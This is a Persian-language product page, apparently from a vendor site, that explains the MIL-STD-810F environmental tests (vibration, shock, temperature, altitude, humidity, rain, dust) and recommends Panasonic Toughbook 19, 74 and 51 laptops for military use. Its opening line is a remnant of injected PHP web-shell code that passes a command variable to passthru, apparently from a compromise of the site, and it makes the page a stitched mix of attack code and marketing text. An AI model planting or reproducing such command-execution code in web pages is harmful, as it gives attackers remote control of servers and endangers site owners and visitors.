'; passthru($cmd); echo ''; exit(); } ?>
You are here: military


تجهیزات الکترونیکی و کامپیوتری ویژه مصارف نظامی و انتظامی یک کلاس جداگانه را در میان اینگونه تجهیزات گشوده است. از سوی دیگر وجود و الزام به تبعیت از استانداردهای گوناگون تجهیزات نظامی معیارهایی ملموس برای انتخاب این تجهیزات در اختیار می گذارد.

لپ تاپ های پیشنهادی همگی از استاندارد نظامی معتبر MIL-STD-810F تبعیت می کنند. احتمالا هیچ چیز جز تشریح استانداردی که این لپ تاپ ها پشت سر گذارده اند نظامیان را جذب نمی کند. بر اساس این استاندارد مولفه های زیر تست می شود:

 

1. لرزه:

سه تست گوناگون روی سه محور بر اساس دو الگوی :

"Composite wheeled vehicle vibration"

"Helicopter vibration"

 و برای هر محور به مدت 60 دقیقه انجام گردیده است (مجموعا 180 دقیقه) :

 از 5 تا 500 Hz

از 1.6 تا 1.96 grms

شماره متد های آزمایش در استاندارد عبارت است از:

514.5C-20, 514.5C-14, 5.14.5C-24

514.4C-4, 514.4C-14

514.4C-4, 514.5C-14

2. ضربه:

سه آزمایشر دادن دستگاه در شرایط ابتدایی:

(20-22°C (68~72°F :دما

980mbar  :فشار

       :70%~60 :رطوبت

سپس در دو راستای مثبت و منفی هر یک از محورهای سه گانه (X-Y-Z) با الگوی دندان اره ای (مجموعا هجده آزمایش) تحت شرایط زیر:

40G, 11 msشماره متد آزمایش در استاندارد عبارت است از:

516.5 Procedure I

3. شوک دمایی:

ابتدا قرا اوج دمایی -40 C و +70 C که دستگاه یک ساعت در هر اوج می ماند و سپس در کمتر از یک دقیقه از -40 C به +70 C می رود و بلعکس

شماره متد آزمایش در استاندارد عبارت است از:

503.4 Procedure I

4. دمای بسیار بالا:

برای دمای بالا در حالی که سیستم در حال کار است سیستم 12 ساعت در دمای +50C و 12 ساعت در دمای +23C کار می کند. این آزمایش برای سه دوره تکرار می شود.

اما در حالی که سیستم در کار نیست است سیستم 12 ساعت در دمای +70C و 12 ساعت در دمای +23C نگه داری می کند. . این آزمایش برای هفت دوره تکرار می شود.

شماره متد آزمایش در استاندارد عبارت است از:

501.4 Procedure II

501.4 Procedure I

5. دمای بسیار پائین:

برای دمای پائین در حالی که سیستم در حال کار است سیستم 12 ساعت در دمای -20C و 12 ساعت در دمای 0C کار می کند. این آزمایش برای سه دوره تکرار می شود.

اما در حالی که سیستم در کار نیست سیستم 12 ساعت در دمای -40C و 12 ساعت در دمای -20C نگه داری می کند. این آزمایش برای هفت دوره تکرار می شود.

شماره متد آزمایش در استاندارد عبارت است از:

502.4 Procedure II

502.4 Procedure I

6. فشار کم اتمسفر در ارتفاع:

در حالی که سیستم در حال کار است با سرعت 10 متر در ثانیه تا ارتفاع 4572 متر بالا برده می شود و برای مدت یک ساعت در آن ارتفاع کار می کند.

اما در حالی که سیستم در کار نیست با سرعت 10 متر در ثانیه تا ارتفاع 21336 متر بالا برده می شود و برای مدت یک ساعت در آن ارتفاع نگهداری می شود.

شماره متد آزمایش در استاندارد عبارت است از:

500.4 Procedure I

500.4 Procedure II

7. رطوبت:

در دوره های بیست و چهار ساعت سیستم در محیطی در بازه رطوبتی زیر به کار گرفته می شود و این آزمایش ده بار تکرار می گردد .

85~95%

شماره متد آزمایش در استاندارد عبارت است از:

507.4 Procedure I

8. باران:

در حالی که آب از یک دوش با فشار 2.78 Kg/cm² در پنج وجه بالا مقابل ، چپ ، راست و پشت به دستگاه می بارد

شماره متد آزمایش در استاندارد عبارت است از:

506.4 Procedure II

9. گرد و خاک:

سیستم در یک فضای یک متر مکعبی قرار می گیرد و به مدت 8 ساعت 2 کیلو گرم خاک به داخل فضا پمپ می شود در این شرایط سیستم در حال کار است

شماره متد آزمایش در استاندارد عبارت است از:

TEST IEC 60529

علاوه بر امکانات و قابلیت های فوق لپ تاپ های پیشنهادی امکان برخورداری از GPS به عنوان گزینه انتخابی را دارا هستند.

 

 


 لپ تاپ های پیشنهادی:

 

مدل ویژگی ها
مدل Toughbook-19

صفحه نمایش لمسی و گردان و بسیار سبک. این مدل جز مدل های کاملا مقاوم محسوب می شود.

مدل Toughbook-74 این مدل جزء مدل های نیمه مقاوم محسوب می شود
مدل Toughbook-51 صفحه نمایش بزرگ ، کارایی بسیار بالا. این مدل جزء مدل های نیمه مقاوم محسوب می شود